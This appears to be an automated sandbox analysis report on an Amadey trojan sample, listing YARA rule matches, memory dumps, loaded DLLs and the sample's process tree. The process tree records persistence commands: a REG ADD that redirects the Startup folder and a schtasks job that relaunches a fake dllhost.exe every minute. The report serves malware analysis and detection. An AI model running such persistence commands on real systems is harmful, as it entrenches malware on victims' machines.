              Source: 0.3.S7AGd447vH.exe.2224848.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a reference_sample = 9039d31d0bd88d0c15ee9074a84f8d14e13f5447439ba80dd759bf937ed20bf2, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 4623c591ea465e23f041db77dc68ddfd45034a8bde0f20fd5fbcec060851200c, id = c4df8d4a-01f4-466f-8225-7c7f462b29e7, last_modified = 2021-08-23
              Source: 7.2.dllhost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
              Source: 7.2.dllhost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a reference_sample = 9039d31d0bd88d0c15ee9074a84f8d14e13f5447439ba80dd759bf937ed20bf2, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 4623c591ea465e23f041db77dc68ddfd45034a8bde0f20fd5fbcec060851200c, id = c4df8d4a-01f4-466f-8225-7c7f462b29e7, last_modified = 2021-08-23
              Source: 7.3.dllhost.exe.22283e58.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
              Source: 7.3.dllhost.exe.22283e58.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a reference_sample = 9039d31d0bd88d0c15ee9074a84f8d14e13f5447439ba80dd759bf937ed20bf2, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 4623c591ea465e23f041db77dc68ddfd45034a8bde0f20fd5fbcec060851200c, id = c4df8d4a-01f4-466f-8225-7c7f462b29e7, last_modified = 2021-08-23
              Source: 7.3.dllhost.exe.22244848.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
              Source: 7.3.dllhost.exe.22244848.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a reference_sample = 9039d31d0bd88d0c15ee9074a84f8d14e13f5447439ba80dd759bf937ed20bf2, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 4623c591ea465e23f041db77dc68ddfd45034a8bde0f20fd5fbcec060851200c, id = c4df8d4a-01f4-466f-8225-7c7f462b29e7, last_modified = 2021-08-23
              Source: 00000001.00000003.1748937794.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
              Source: 00000001.00000003.1748937794.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_c4df8d4a reference_sample = 9039d31d0bd88d0c15ee9074a84f8d14e13f5447439ba80dd759bf937ed20bf2, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 4623c591ea465e23f041db77dc68ddfd45034a8bde0f20fd5fbcec060851200c, id = c4df8d4a-01f4-466f-8225-7c7f462b29e7, last_modified = 2021-08-23
              Source: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_c4df8d4a reference_sample = 9039d31d0bd88d0c15ee9074a84f8d14e13f5447439ba80dd759bf937ed20bf2, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 4623c591ea465e23f041db77dc68ddfd45034a8bde0f20fd5fbcec060851200c, id = c4df8d4a-01f4-466f-8225-7c7f462b29e7, last_modified = 2021-08-23
              Source: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
              Source: 00000007.00000003.1819904387.0000000022241000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
              Source: 00000007.00000003.1819904387.0000000022241000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_c4df8d4a reference_sample = 9039d31d0bd88d0c15ee9074a84f8d14e13f5447439ba80dd759bf937ed20bf2, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 4623c591ea465e23f041db77dc68ddfd45034a8bde0f20fd5fbcec060851200c, id = c4df8d4a-01f4-466f-8225-7c7f462b29e7, last_modified = 2021-08-23
              Source: 00000000.00000003.1704095067.0000000000910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
              Source: 00000000.00000003.1704095067.0000000000910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_c4df8d4a reference_sample = 9039d31d0bd88d0c15ee9074a84f8d14e13f5447439ba80dd759bf937ed20bf2, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 4623c591ea465e23f041db77dc68ddfd45034a8bde0f20fd5fbcec060851200c, id = c4df8d4a-01f4-466f-8225-7c7f462b29e7, last_modified = 2021-08-23
              Source: 00000007.00000002.1820165445.0000000000428000.00000004.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_c4df8d4a reference_sample = 9039d31d0bd88d0c15ee9074a84f8d14e13f5447439ba80dd759bf937ed20bf2, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 4623c591ea465e23f041db77dc68ddfd45034a8bde0f20fd5fbcec060851200c, id = c4df8d4a-01f4-466f-8225-7c7f462b29e7, last_modified = 2021-08-23
              Source: 00000007.00000002.1820138863.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
              Source: 00000007.00000003.1818805602.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
              Source: 00000007.00000003.1818805602.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_c4df8d4a reference_sample = 9039d31d0bd88d0c15ee9074a84f8d14e13f5447439ba80dd759bf937ed20bf2, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 4623c591ea465e23f041db77dc68ddfd45034a8bde0f20fd5fbcec060851200c, id = c4df8d4a-01f4-466f-8225-7c7f462b29e7, last_modified = 2021-08-23
              Source: 00000000.00000003.1704876629.0000000002221000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
              Source: 00000000.00000003.1704876629.0000000002221000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_c4df8d4a reference_sample = 9039d31d0bd88d0c15ee9074a84f8d14e13f5447439ba80dd759bf937ed20bf2, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 4623c591ea465e23f041db77dc68ddfd45034a8bde0f20fd5fbcec060851200c, id = c4df8d4a-01f4-466f-8225-7c7f462b29e7, last_modified = 2021-08-23
              Source: 00000001.00000003.1749767253.0000000002201000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
              Source: 00000001.00000003.1749767253.0000000002201000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_c4df8d4a reference_sample = 9039d31d0bd88d0c15ee9074a84f8d14e13f5447439ba80dd759bf937ed20bf2, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 4623c591ea465e23f041db77dc68ddfd45034a8bde0f20fd5fbcec060851200c, id = c4df8d4a-01f4-466f-8225-7c7f462b29e7, last_modified = 2021-08-23
              Source: Process Memory Space: S7AGd447vH.exe PID: 7524, type: MEMORYSTRMatched rule: Windows_Trojan_Amadey_c4df8d4a reference_sample = 9039d31d0bd88d0c15ee9074a84f8d14e13f5447439ba80dd759bf937ed20bf2, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 4623c591ea465e23f041db77dc68ddfd45034a8bde0f20fd5fbcec060851200c, id = c4df8d4a-01f4-466f-8225-7c7f462b29e7, last_modified = 2021-08-23
              Source: Process Memory Space: dllhost.exe PID: 7608, type: MEMORYSTRMatched rule: Windows_Trojan_Amadey_c4df8d4a reference_sample = 9039d31d0bd88d0c15ee9074a84f8d14e13f5447439ba80dd759bf937ed20bf2, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 4623c591ea465e23f041db77dc68ddfd45034a8bde0f20fd5fbcec060851200c, id = c4df8d4a-01f4-466f-8225-7c7f462b29e7, last_modified = 2021-08-23
              Source: Process Memory Space: dllhost.exe PID: 7856, type: MEMORYSTRMatched rule: Windows_Trojan_Amadey_c4df8d4a reference_sample = 9039d31d0bd88d0c15ee9074a84f8d14e13f5447439ba80dd759bf937ed20bf2, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 4623c591ea465e23f041db77dc68ddfd45034a8bde0f20fd5fbcec060851200c, id = c4df8d4a-01f4-466f-8225-7c7f462b29e7, last_modified = 2021-08-23
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@13/2@18/1
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeMutant created: \Sessions\1\BaseNamedObjects\152122461226583693405117
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7688:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7736:120:WilError_03
              Source: C:\Users\user\Desktop\S7AGd447vH.exeFile created: C:\Users\user\AppData\Local\Temp\15212246122658369340Jump to behavior
              Source: C:\Users\user\Desktop\S7AGd447vH.exeCommand line argument: ~IB0_2_004248D0
              Source: S7AGd447vH.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\S7AGd447vH.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\S7AGd447vH.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: S7AGd447vH.exeReversingLabs: Detection: 65%
              Source: S7AGd447vH.exeVirustotal: Detection: 69%
              Source: S7AGd447vH.exeString found in binary or memory: /pkg/Loader.exe
              Source: dllhost.exeString found in binary or memory: /pkg/Loader.exe
              Source: C:\Users\user\Desktop\S7AGd447vH.exeFile read: C:\Users\user\Desktop\S7AGd447vH.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\S7AGd447vH.exe "C:\Users\user\Desktop\S7AGd447vH.exe"
              Source: C:\Users\user\Desktop\S7AGd447vH.exeProcess created: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe "C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe"
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\3e5d740863\
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN dllhost.exe /TR "C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe" /F
              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\3e5d740863\
              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
              Source: C:\Users\user\Desktop\S7AGd447vH.exeProcess created: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe "C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe" Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\3e5d740863\Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN dllhost.exe /TR "C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe" /FJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\3e5d740863\Jump to behavior
              Source: C:\Users\user\Desktop\S7AGd447vH.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\S7AGd447vH.exeSection loaded: msimg32.dllJump to behavior
              Source: C:\Users\user\Desktop\S7AGd447vH.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\S7AGd447vH.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\S7AGd447vH.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\S7AGd447vH.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\S7AGd447vH.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\S7AGd447vH.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\S7AGd447vH.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\S7AGd447vH.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\S7AGd447vH.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\S7AGd447vH.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\S7AGd447vH.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\S7AGd447vH.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\S7AGd447vH.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\S7AGd447vH.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\S7AGd447vH.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\S7AGd447vH.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\S7AGd447vH.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\S7AGd447vH.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\S7AGd447vH.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\S7AGd447vH.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\S7AGd447vH.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\S7AGd447vH.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\S7AGd447vH.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: msimg32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: msimg32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: msimg32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\S7AGd447vH.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: S7AGd447vH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: OfficeDesktop.pdb source: S7AGd447vH.exe, dllhost.exe.0.dr
              Source: Binary string: D:\Mktmp\NL1\Release\NL1.pdb source: S7AGd447vH.exe, 00000000.00000003.1704095067.0000000000910000.00000004.00001000.00020000.00000000.sdmp, S7AGd447vH.exe, 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp, S7AGd447vH.exe, 00000000.00000003.1704876629.0000000002221000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1748937794.0000000000600000.00000004.00001000.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1749767253.0000000002201000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000007.00000003.1819904387.0000000022241000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000007.00000002.1820165445.0000000000428000.00000004.00000001.01000000.00000005.sdmp, dllhost.exe, 00000007.00000003.1818805602.0000000000630000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: combase.pdb source: S7AGd447vH.exe, 00000000.00000003.1704708297.0000000022900000.00000004.00001000.00020000.00000000.sdmp, S7AGd447vH.exe, 00000000.00000003.1704573003.000000002266E000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1749567916.0000000022AB0000.00000004.00001000.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1749409581.0000000022823000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000007.00000003.1819408619.0000000022688000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000007.00000003.1819679892.0000000022910000.00000004.00001000.00020000.00000000.sdmp
